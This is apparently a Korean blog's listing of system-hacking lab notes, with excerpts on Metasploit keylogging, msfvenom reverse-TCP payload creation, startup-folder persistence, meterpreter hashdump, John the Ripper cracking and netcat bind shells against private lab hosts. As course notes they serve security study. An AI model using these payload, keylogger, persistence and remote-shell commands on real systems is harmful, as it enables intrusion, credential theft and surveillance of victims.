본문 바로가기

시스템 해킹20

시스템 해킹 14 [2024.06.27] [Key Logger] 01. 메모장 실행 02. >ps   03. >migrate 1234 04. > run post/windows/capture/keylog_recorder 05. 메모장에 타이핑 06. CTRL+C로 저장 07. #cat/root/.msf4/loot/20240627210626_default_192.168.10.201_host.windows.key_260383.txt   오늘 실습의 시작은 지난 시간에 배운 걸 복습 개념으로 다시 시도해 본다   2008도 똑같이 shell:startup을 실행해 주고 바탕화면에 있는 win10_m.exe를 복사 붙여넣기 한다 *2008 이후로 보안이 강화되어 2008에서는 레지스트리를 할 필요가 없다    시작 프로그램에 악성.. 2024. 6. 28.
시스템 해킹 13 [2024.06.26] [Reverse TCP] 01. 악성코드 생성 #msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10.exe #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10_m.exe #vi reverse.rc use exploit/multi/handlerset payload windows/x64/shell/reverse_tcpset lhost 192.168.10.250set lport 4444set exitonsession falseexploit -.. 2024. 6. 27.
시스템 해킹 12 [2024.06.25] [Windows 7] > set payload windows/x64/meterpreter/bind_tcp> set payload windows/x64/meterpreter/bind_tcp> set rhost 192.168.10.201> exploit > sysinfo: 시스템 정보 출력> screenshot: 공격 대상자의 화면 저장> screenshare: 실시간 화면 공유> hashdump: 패스워드 덤핑> migrate: 프로세스 권한 탈취/획득 > mkdir: 디렉터리 생성> rmdir: 디렉터리 삭제> upload: 파일 올리기> download: 파일 내려받기> pwd: 현재 디렉터리> dir: 파일/디렉터리 목록 출력> ifconfig: IP 정보 출력(침투 시 사용 .. 2024. 6. 26.
시스템 해킹 11 [2024.06.24][Password Crack] 01. 소스 다운로드 및 묶음 해제 #tar -xvf John_the_Ripper_C_소스_john-1.7.8.tar #cd /home/test/john-1.7.8/src#vi Makefile LDFLAGS= -s -lcrypt    먼저 John 파일을 root에 넣기 위해CentOS 7 위치를 열어 다른 위치를 눌러 컴퓨터를 클릭한다  컴퓨터를 누르게 되면 해당 위치들이 나오는데 이 중에서 root로 들어간다   다른 곳을 눌러 들어갈 필요 없이 바로 john 파일을 넣어 준다 *USB를 이용하여 드래그 앤 드롭으로 옮기거나 메일로 저장해야 된다   다운로드한 John 파일 자체가 압축 파일이기 때문에tar 명령어를 사용하여 압축을 해제시켜 준다  .. 2024. 6. 25.
시스템 해킹 10 [2024.06.21] [Netcat] #nc 192.168.10.201 1234 #nc 192.168.10.201 1234 c:\netcat>nc 192.168.10.202 1234 c:\netcat>nc -L -e c:\windows\system32\cmd.exe -p 1234 c:\netcat>nc -L -e c:\windows\system32\cmd.exe -p 1234 -L: 영구 리스너 생성-v: 상세 모드-n: DNS 주소 변환 기능 끄기  지난 시간에 배웠던 netcat을 이번 시간에 이어 윈도우에 적용시켜 보려고 한다Windows 7인 201번 서버에서 netcat을 실행시켜 주고  an 명령어로 포트 번호 1234번이 제대로 대기 상태인지 확인한다  그 후 50번 서버인 CentOS 7.. 2024. 6. 23.
시스템 해킹 9 [2024.06.20] > nc를 활용한 Bind/Reverse TCP> netCat 방화벽에 의해 공격이 불가능한 상태에서 공격자인 Kali에게 접근한다   [Kali Linux]#nc 192.168.10.50 4444 > Kali에서 CentOS7 프롬포트 가져오기python -c 'import pty;pty.spawn("/bin/bash")' [CentOS7]#nc -e /bin/bash -l -p 4444  일단 처음은 50번 서버의 CentOS7에서 시작한다포트 번호를 지정해서 공격을 시도하고 창을 하나 더 열어 netstat -tuna 옵션으로화면에 4444번 포트가 대기 중인 것까지 확인한다    현재 4444번 포트가 대기 중이므로 Kali Linux로 넘어간 후nc 명령어와 접속할 IP .. 2024. 6. 21.